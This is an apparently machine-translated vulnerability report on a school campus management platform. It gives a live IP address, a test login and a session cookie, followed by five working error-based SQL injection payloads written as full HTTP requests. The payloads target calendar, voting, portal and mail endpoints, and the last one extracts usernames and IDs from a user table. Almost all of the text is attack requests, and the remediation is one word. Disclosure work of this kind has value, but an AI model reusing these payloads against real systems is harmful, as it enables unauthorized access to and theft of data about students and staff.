Beijing lezhi line Software Limited Company, general campus management platform official case: http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml our Beijing 101 Middle School For example: Case URL: http: // 202.108.154.209/datacenter/# test user: test123/123456 first SQL injection: 1. Common Student User Login 2. weekly calendar -- export calendar -- OK 3. Send the following request: Link: http: // 202.108.154.209/oa/calendar/exportExcel. do
POST:exportStartDate=2014-03-03&exportEndDate=2014-03-04&exportCalendars=zhaojinfeng2%E6%97%A5%E5%8E%86&exportCalendarIds=16d07c5ff5e44036b5a44751ab2df91e') AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((user()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and ('1'='1
SQL Injection exportCalendars. After the request is sent, the file will be downloaded, And the injected content will be in this file. OK. download the file. Opening the file is the result of our injection: second SQL injection: 1. Common Student users log on to the system. 2. Choose a calendar for one week to modify the calendar. (No calendar is created) -- save changes 3. When saving is a packet capture modify problem parameters modify c0-e1 parameters in the c0-e1, send the modified parameters as follows:
POST /oa/dwr/call/plaincall/calendarRemoteCallController.saveEvent.dwr HTTP/1.1Host: 202.108.154.209Cookie: AQ_AUTHENTICATION_COOKIE_KEY=aae03b698ecd444aa0ae02f8d87c026acallCount=1windowName=pageContentc0-scriptName=calendarRemoteCallControllerc0-methodName=saveEventc0-id=0c0-e1=string:0e362687769f426380ab1b8a015ef014' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='ac0-e2=string:c0-e3=string:1111111111111c0-e4=string:2014-03-04c0-e5=string:2014-03-04c0-e6=boolean:truec0-e7=boolean:truec0-e8=string:rgb(230%2C115%2C153)c0-e9=number:1c0-e10=null:nullc0-e11=string:-1c0-e12=number:2c0-e13=string:arrangec0-e14=number:0c0-e15=null:nullc0-e16=null:nullc0-e17=string:c0-e18=string:c0-e19=string:c0-e20=string:c0-e21=string:0c0-param0=Object_Object:{id:reference:c0-e1, eventId:reference:c0-e2, title:reference:c0-e3, start:reference:c0-e4, end:reference:c0-e5, allDay:reference:c0-e6, editable:reference:c0-e7, backgroundColor:reference:c0-e8, priority:reference:c0-e9, calendarNameId:reference:c0-e10, remind:reference:c0-e11, privacy:reference:c0-e12, eventType:reference:c0-e13, eventStatus:reference:c0-e14, calendarProjectId:reference:c0-e15, arrangeRelation:reference:c0-e16, messageTaskId:reference:c0-e17, dutier:reference:c0-e18, parter:reference:c0-e19, site:reference:c0-e20, xlts:reference:c0-e21}c0-param1=string:c0-param2=boolean:falsec0-param3=boolean:truebatchId=25page=%2Foa%2F%2Fcalendar%2FinitCalendar.do%3F__time__%3D1394571647842httpSessionId=scriptSessionId=4C1126686168926E787E3EBB1EA961EF
If an error is returned, the expected data is successfully injected into the error message. The third part is SQL injection: 1. log on to a common student user. 2. Add my vote on my desktop. Search for the topic. 3. Capture packets and modify the criteria and criteria parameters. Send the following request:
POST /datacenter/vote/myVoteList.do HTTP/1.1Host: 202.108.154.209Cookie: aae03b698ecd444aa0ae02f8d87c026a_search=false&nd=1394576122963&rows=50&page=1&sidx=from_date&sord=desc&criteria=theme+like+'%25123%25'+AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a'
The desired data is successfully injected. The fourth part is SQL injection: 1. Common Student User Login 2. My portal-add portal items-Common Information 3. Publish common information 4. When publishing a message, cut the packet and modify it, the parameter ID has the following request sent by SQL injection: URL: http: // 202.108.154.209/oa // mail/personal/save. do
POST:privat=2&portlet=portlet&xxzt=complete&id=822b6cdadc7140fe91da513963d4efdc' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and 'a'='a&xxbt=222222&fbsf=个人:zhaojinfeng2&fjrsf=&info=<p>222222<br/></p>&editorValue=<p>222222<br/></p>Cookie: AQ_AUTHENTICATION_COOKIE_KEY=aae03b698ecd444aa0ae02f8d87c026a
User () Data injected successfully: SQL Injection: 1. log on to a common student user. 2. log on to my desktop, add the desktop, and go to campus office. 3. Go to the mail center. 4. Write a letter. When writing a letter, Preview It. http: // 202.108.154.209/oa/dwr/call/plaincall/MailController. getNotReadtotalNumByClassify. dwr POST parameter c0-param0 has injection, When you modify the c0-param0 to: c0-param0 = string: 2' AND (SELECT 1 FROM (select count (*), CONCAT (0x23, (SELECT concat (username, 0x23, user_id) from aq_user limit 0, 1), 0x23, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) AND 'A' = 'a inject the username AND user_id to send the following request: Connection: http: // 202.108.154.209/oa/dwr/call/plaincall/MailController. getNotReadtotalNumByClassify. dwr
POST:callCount=1windowName=c0-scriptName=MailControllerc0-methodName=getNotReadtotalNumByClassifyc0-id=0c0-param0=string:2' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,user_id) from aq_user limit 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='abatchId=112page=%2Fdatacenter%2Fportlet%2FshowPortletList.do%3FmenuId%3Ded57d3b21fff48738552a4601ed30e55httpSessionId=scriptSessionId=3756A70426EB76F99A0BBDDF3AC4FEBC
Solution: Filter